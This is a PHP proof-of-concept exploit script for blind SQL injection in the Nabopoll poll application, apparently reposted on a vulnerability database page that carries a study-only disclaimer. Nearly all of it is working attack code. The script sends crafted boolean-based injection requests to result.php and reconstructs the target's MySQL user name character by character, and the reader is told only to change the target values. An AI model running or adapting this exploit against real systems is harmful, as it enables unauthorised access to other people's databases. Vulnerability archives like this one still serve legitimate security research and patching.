<? # Nabopoll Blind SQL Injection P0C Exploit # Download: www.nabocorp.com/nabopoll/ # coded by s0cratex # Contact: s0cratex@hotmail.com error_reporting(0); ini_set(\"max_execution_time\",0); // just change the default values... $srv = \"localhost\"; $path = \"/poll\"; $port = 80; $survey = \"8\"; //you can verify the number entering in the site and viewing the results... echo \"================================================== \"; echo \"Nabopoll SQL Injection -- Proof of Concept Exploit \"; echo \"-------------------------------------------------- \"; echo \" -- MySQL User: \"; $j = 1; $user = \"\"; while(!strstr($user,chr(0))){ for($x=0;$x<255;$x++){ $xpl = \"/result.php?surv=\".$survey.\"/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),\".$j.\",1))=\".$x.\"),1,0)))/*\"; $cnx = fsockopen($srv,$port); fwrite($cnx,\"GET \".$path.$xpl.\" HTTP/1.0 \"); while(!feof($cnx)){ if(ereg(\"power\",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } } fclose($cnx); if ($x==255) { die(\" Try again...\"); } } $j++; } echo \" \"; ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论